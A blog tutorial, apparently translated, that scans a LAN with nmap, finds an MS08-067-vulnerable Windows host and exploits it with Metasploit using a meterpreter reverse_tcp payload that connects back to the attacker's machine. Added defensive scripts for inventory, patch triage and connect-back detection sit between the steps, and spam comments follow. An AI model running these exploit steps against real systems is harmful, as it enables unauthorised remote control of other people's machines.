
[BackTrack] Exploitation in practice with Metasploit

Information Security | eason | 19969 views | 14 comments

1. Scan the LAN for live hosts and save the results to ip.txt

root@bt:~# nmap -sP 192.168.1.0/24 | grep '192.168.1.*' >> /root/Desktop/ip.txt

The contents of ip.txt are as follows:

[screenshot: contents of ip.txt]

After tidying up the format:

[screenshot: ip.txt after reformatting]

2. Scan the operating systems of the live hosts

root@bt:~# nmap -O -iL /root/Desktop/os.txt

Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-30 20:18 CST
Nmap scan report for localhost (192.168.1.11)
Host is up (0.023s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1521/tcp open  oracle
2525/tcp open  ms-v-worlds
5560/tcp open  isqlplus
MAC Address: 00:F1:40:54:06:76 (Unknown)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp3:home
OS details: Microsoft Windows XP Home Edition SP3
Network Distance: 1 hop

Nmap scan report for localhost (192.168.1.13)
Host is up (0.00013s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
903/tcp   open  iss-console-mgr
3306/tcp  open  mysql
5357/tcp  open  wsdapi
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
MAC Address: 74:E5:0B:99:6A:AA (Intel Corporate)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.01%E=4%D=7/30%OT=135%CT=1%CU=30640%PV=Y%DS=1%DC=D%G=Y%M=74E50B%
OS:TM=55BA1631%P=i686-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=102%TI=I%CI=I%II=I%
OS:SS=S%TS=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST
OS:11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=200
OS:0%W6=2000)ECN(R=Y%DF=Y%T=41%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=41
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=41%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R
OS:=Y%DF=Y%T=41%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=41%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=41%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=41%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=41%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=41%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=41%CD=Z)

Network Distance: 1 hop

Nmap scan report for localhost (192.168.1.19)
Host is up (0.0090s latency).
Not shown: 993 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
MAC Address: 78:92:9C:8A:52:16 (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows Vista
OS CPE: cpe:/o:microsoft:windows_vista
OS details: Microsoft Windows Vista
Network Distance: 1 hop

Nmap scan report for localhost (192.168.1.21)
Host is up (0.0054s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5357/tcp open  wsdapi
MAC Address: 78:92:9C:89:9A:FC (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows Vista|2008|7 (97%)
OS CPE: cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (97%), Microsoft Windows 7 Professional (95%), Microsoft Windows Vista SP2 or Windows Server 2008 (95%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP0 - SP1 (92%), Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008 (91%), Microsoft Windows Vista Home Premium SP1 (89%), Microsoft Windows Server 2008 R2 (88%), Microsoft Windows Server 2008 SP2 (88%), Microsoft Windows 7 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Nmap scan report for localhost (192.168.1.22)
Host is up (0.000025s latency).
All 1000 scanned ports on localhost (192.168.1.22) are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops

Nmap scan report for localhost (192.168.1.210)
Host is up (0.00038s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
1041/tcp open  danf-ak2
MAC Address: 00:0C:29:A1:60:82 (VMware)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop

Nmap scan report for localhost (192.168.1.250)
Host is up (0.0050s latency).
Not shown: 984 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
912/tcp  open  apex-mesh
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1037/tcp open  ams
1041/tcp open  danf-ak2
1521/tcp open  oracle
2030/tcp open  device2
2401/tcp open  cvspserver
3306/tcp open  mysql
3389/tcp open  ms-wbt-server
7778/tcp open  interwise
MAC Address: 00:13:72:2E:88:83 (Dell)
Device type: general purpose
Running: Microsoft Windows 2000|XP|2003
OS CPE: cpe:/o:microsoft:windows_2000::sp2 cpe:/o:microsoft:windows_2000::sp3 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::- cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 7 IP addresses (7 hosts up) scanned in 42.31 seconds
root@bt:~#
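The OS-detection output above is also the raw material for a defender's asset inventory: which hosts expose SMB (445/139), and which of those run an operating system that is out of support. The shell script below is an added example, not code from the original post. It runs awk over a constructed excerpt of nmap's normal output (embedded in nmap_os_sample and modelled on the scan above); the function names, the tab-separated layout and the legacy-OS pattern are my own choices.

```shell
#!/bin/sh
# Added example: build a host inventory from "nmap -O" normal output.
# Not from the original post; nmap_os_sample is a constructed excerpt.

nmap_os_sample() {
cat <<'EOF'
Nmap scan report for localhost (192.168.1.11)
Host is up (0.023s latency).
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
OS details: Microsoft Windows XP Home Edition SP3

Nmap scan report for localhost (192.168.1.19)
Host is up (0.0090s latency).
PORT      STATE SERVICE
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
OS details: Microsoft Windows Vista

Nmap scan report for localhost (192.168.1.22)
Host is up (0.000025s latency).
All 1000 scanned ports on localhost (192.168.1.22) are closed
Too many fingerprints match this host to give specific OS details
EOF
}

# One line per host: ip<TAB>smb-exposed(yes/no)<TAB>os details.
# A host without an "OS details:" line is reported as "unknown", not dropped.
inventory() {
  awk '
    function flush() {
      if (ip != "") printf "%s\t%s\t%s\n", ip, (smb ? "yes" : "no"), os
      ip = ""; smb = 0; os = "unknown"
    }
    /^Nmap scan report for/ { flush(); ip = $NF; gsub(/[()]/, "", ip) }
    /^(445|139)\/tcp +open/  { smb = 1 }
    /^OS details: /           { os = substr($0, 13) }
    END { flush() }
  '
}

# Hosts that still expose SMB and report an out-of-support Windows version:
# the same combination that the MS08-067 check later in the post singles out.
legacy_smb_hosts() {
  inventory | awk -F'\t' '$2 == "yes" && $3 ~ /Windows (2000|XP|Server 2003)/ { print $1 }'
}

# Usage on real output: nmap -O -iL hosts.txt | inventory
nmap_os_sample | legacy_smb_hosts
```

Pipe real scan output into inventory to get one line per host; legacy_smb_hosts picks out the hosts to prioritise for patching or for firewalling 445/139 from untrusted segments.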

3. Batch-scan for vulnerabilities

root@bt:~# nmap -iL /root/Desktop/ip.txt --script=smb-check-vulns

Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-30 21:57 CST
Nmap scan report for localhost (192.168.1.8)
Host is up (0.0078s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5357/tcp open  wsdapi
MAC Address: 78:92:9C:89:9A:FC (Intel Corporate)

Host script results:
| smb-check-vulns:
|   Conficker: UNKNOWN; got error No accounts left to try
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap scan report for localhost (192.168.1.11)
Host is up (0.011s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1521/tcp open  oracle
2525/tcp open  ms-v-worlds
5560/tcp open  isqlplus
MAC Address: 00:F1:40:54:06:76 (Unknown)

Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap scan report for localhost (192.168.1.13)
Host is up (0.000094s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
903/tcp   open  iss-console-mgr
3306/tcp  open  mysql
5357/tcp  open  wsdapi
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
MAC Address: 74:E5:0B:99:6A:AA (Intel Corporate)

Host script results:
| smb-check-vulns:
|   Conficker: UNKNOWN; got error No accounts left to try
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap scan report for localhost (192.168.1.19)
Host is up (0.021s latency).
Not shown: 993 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
MAC Address: 78:92:9C:8A:52:16 (Intel Corporate)

Host script results:
| smb-check-vulns:
|   Conficker: UNKNOWN; got error No accounts left to try
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap scan report for localhost (192.168.1.22)
Host is up (0.0000070s latency).
All 1000 scanned ports on localhost (192.168.1.22) are closed

Nmap scan report for localhost (192.168.1.210)
Host is up (0.00090s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
1041/tcp open  danf-ak2
MAC Address: 00:0C:29:A1:60:82 (VMware)

Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap scan report for localhost (192.168.1.250)
Host is up (0.025s latency).
Not shown: 984 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
912/tcp  open  apex-mesh
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1037/tcp open  ams
1041/tcp open  danf-ak2
1521/tcp open  oracle
2030/tcp open  device2
2401/tcp open  cvspserver
3306/tcp open  mysql
3389/tcp open  ms-wbt-server
7778/tcp open  interwise
MAC Address: 00:13:72:2E:88:83 (Dell)

Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE    <-- found a vulnerability that can be exploited
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap done: 7 IP addresses (7 hosts up) scanned in 20.17 seconds
root@bt:~#
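A defender reading the smb-check-vulns output wants three buckets, not one: hosts reported VULNERABLE, hosts reported NOT VULNERABLE, and hosts the script could not test at all. Note that several hosts above have no MS08-067 line whatsoever and only the "No accounts left to try" error: for those the check never ran, so they are unknown rather than clean. The script below is an added example, not part of the original post; it runs awk over a constructed excerpt of the scan above (smb_vulns_sample), and the state names and function names are my own.

```shell
#!/bin/sh
# Added example: triage MS08-067 results from "nmap --script=smb-check-vulns".
# Not from the original post; smb_vulns_sample is a constructed excerpt.

smb_vulns_sample() {
cat <<'EOF'
Nmap scan report for localhost (192.168.1.11)
Host is up (0.011s latency).
445/tcp  open  microsoft-ds
Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap scan report for localhost (192.168.1.13)
Host is up (0.000094s latency).
445/tcp   open  microsoft-ds
Host script results:
| smb-check-vulns:
|   Conficker: UNKNOWN; got error No accounts left to try
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap scan report for localhost (192.168.1.250)
Host is up (0.025s latency).
445/tcp  open  microsoft-ds
Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
EOF
}

# One line per host: ip<TAB>MS08-067 state.
# A host with no "MS08-067:" line at all is reported as UNTESTED, so a
# failed check can never be mistaken for a clean result.
ms08_067_triage() {
  awk '
    function flush() {
      if (ip != "") printf "%s\t%s\n", ip, state
      ip = ""; state = "UNTESTED"
    }
    /^Nmap scan report for/ { flush(); ip = $NF; gsub(/[()]/, "", ip) }
    /^[|]   MS08-067: /     { state = $3; if ($3 == "NOT") state = "NOT VULNERABLE" }
    END { flush() }
  '
}

# Hosts to patch (the MS08-067 update, KB958644) or isolate first.
needs_patch() {
  ms08_067_triage | awk -F'\t' '$2 == "VULNERABLE" { print $1 }'
}

# Usage on real output: nmap -iL hosts.txt --script=smb-check-vulns | ms08_067_triage
smb_vulns_sample | ms08_067_triage
```

Hosts in the VULNERABLE bucket need the MS08-067 update or their SMB ports blocked from untrusted segments; hosts in the UNTESTED bucket need the check re-run before anyone treats them as clean.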

4. Use Metasploit to exploit the overflow and obtain the highest privileges on the system.

In the BackTrack shell, type msfconsole to open Metasploit

root@bt:~# msfconsole

[screenshot]

Search for the exploit for the ms08_067 vulnerability

[screenshot]

Use "use" to load the ms08_067 attack module

msf > use exploit/windows/smb/ms08_067_netapi

Set the corresponding payload, i.e. the shellcode

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

[screenshot]

Set the parameters

[screenshot]

RHOST   the target machine's IP address

LPORT   the port that reverse_tcp connects back to; if something is blocking the connection, this is the setting to change.

LHOST   the IP address of your own machine

Check the configured parameters and make sure they are correct

msf  exploit(ms08_067_netapi) > show options

Once they are confirmed, run the exploit

msf  exploit(ms08_067_netapi) > exploit -j

[screenshot]

After the exploit completes, list the sessions available to connect to

msf  exploit(ms08_067_netapi) > sessions -l

[screenshot]

Connect to session 1

msf  exploit(ms08_067_netapi) > sessions -i 1

[screenshot]

Run the VNC connection

[screenshot]

[screenshot]
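The exploit step above has a network signature that does not depend on the exploit itself: the target accepts an inbound SMB connection from LHOST and, seconds later, opens an outbound connection back to LHOST on LPORT, because windows/meterpreter/reverse_tcp is a connect-back payload. The script below is an added example and not from the original post. It runs that detection over a constructed, time-sorted connection log (conn_log_sample; the five columns, epoch, source IP, source port, destination IP, destination port, are a format I made up for the example), and the 60-second window is an assumed default.

```shell
#!/bin/sh
# Added example: flag the connect-back shape of a reverse_tcp session in a
# connection log. Not from the original post; conn_log_sample is constructed
# (epoch src sport dst dport, sorted by time) and its port 4444 is arbitrary.

conn_log_sample() {
cat <<'EOF'
1438264800 192.168.1.22 49321 192.168.1.250 445
1438264803 192.168.1.250 1044 192.168.1.22 4444
1438264850 192.168.1.13 50110 192.168.1.250 445
1438265000 192.168.1.250 1045 192.168.1.13 443
1438265100 192.168.1.250 1046 192.168.1.19 80
EOF
}

# Rule: inbound SMB from peer P to host H, then an outbound connection from
# H back to P within WINDOW seconds (default 60, an assumed value).
# Only the most recent inbound SMB connection per (H, P) pair is remembered.
reverse_callbacks() {
  WINDOW="${1:-60}"
  awk -v w="$WINDOW" '
    $5 == 445 { seen[$4 "," $2] = $1; next }
    {
      key = $2 "," $4
      if (key in seen && $1 - seen[key] <= w)
        printf "%s connected back to %s:%s %ds after inbound SMB\n", $2, $4, $5, $1 - seen[key]
    }
  '
}

# Usage on real data: export flow or firewall logs in the same column order,
# sorted by time, and pipe them into reverse_callbacks [window_seconds].
conn_log_sample | reverse_callbacks
```

On the sample only the 3-second connect-back is reported; the 150-second gap on the second pair is outside the default window and the last line has no preceding inbound SMB at all. A file server that only ever answers SMB should have no outbound connections to workstations, so a stricter rule with no time window is also defensible. The fix for the exposure remains the same as in the previous section: patch, and keep 445/139 unreachable from untrusted segments.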


金笔头博客 (Jinbitou Blog), all rights reserved. Unless otherwise noted, all posts are original; when reposting please credit [BackTrack]漏洞利用之metasploit实战
14 comments
  1. Thanks-a-mundo for the post. Really thank you! Much obliged.
    ottoman coffee table, 2016-02-10 18:34 Reply Windows XP | Opera 9.64
  2. wow, awesome blog article. Much thanks again. Really Great.
    amateur porno, 2016-02-03 12:05 Reply Windows 7 | Firefox 3.5.3
  3. I simply want to say I'm new to blogs and certainly enjoyed your page. More than likely I'm likely to bookmark your blog post. You really have remarkable article content. Regards for sharing with us your blog.
    you could look here, 2016-01-26 03:37 Reply Windows XP | Internet Explorer 7.0
  4. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I've been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.
    • you can search the plugin named "wp-connect"
      wangyisheng, 2016-01-24 19:19 Reply Windows 7 | Chrome 47.0.2526.106
  5. hola amigos, funcionan los comentarios?
    Andrew, 2016-01-07 02:37 Reply Windows XP | Opera 8.50
  6. Hi, Neat post. There is a problem together with your website in web explorer, may check this? IE still is the market leader and a huge portion of other people will pass over your excellent writing due to this problem.
    parajumpers mens coats london, 2015-12-27 01:47 Reply Windows 7 | Unknown browser
  7. I'm extremely impressed with your writing skills as well as with the layout on your weblog. Is this a paid theme or did you modify it yourself? Anyway keep up the excellent quality writing, it is rare to see a great blog like this one today.
    ugg pas cher eu, 2015-12-26 23:09 Reply Windows 7 | Unknown browser
    • it's a free theme and i modified slightly :mrgreen:
      wangyisheng, 2015-12-28 17:14 Reply Windows 7 | Chrome 47.0.2526.106
  8. Hmm it seems like your blog ate my first comment (it was extremely long) so I guess I'll just sum it up what I had written and say, I'm thoroughly enjoying your blog. I too am an aspiring blog writer but I'm still new to the whole thing. Do you have any tips for beginner blog writers? I'd really appreciate it.
    moncler dylan traduction, 2015-12-15 20:15 Reply Windows 7 | Unknown browser
    • i am new too, i just write what i am learning :razz:
      wangyisheng, 2015-12-15 22:04 Reply Windows 7 | Chrome 45.0.2454.101
  9. Good replies in return of this matter with real arguments and telling the whole thing concerning that.
    nike air force uomo, 2015-12-12 01:18 Reply Windows 7 | Unknown browser
  10. It's amazing in favor of me to have a web site, which is helpful designed for my know-how. thanks admin
    nike air max classics kopen, 2015-12-07 18:31 Reply Windows 7 | Unknown browser
    • you are welcome
      wangyisheng, 2015-12-07 19:02 Reply Windows 7 | Chrome 45.0.2454.101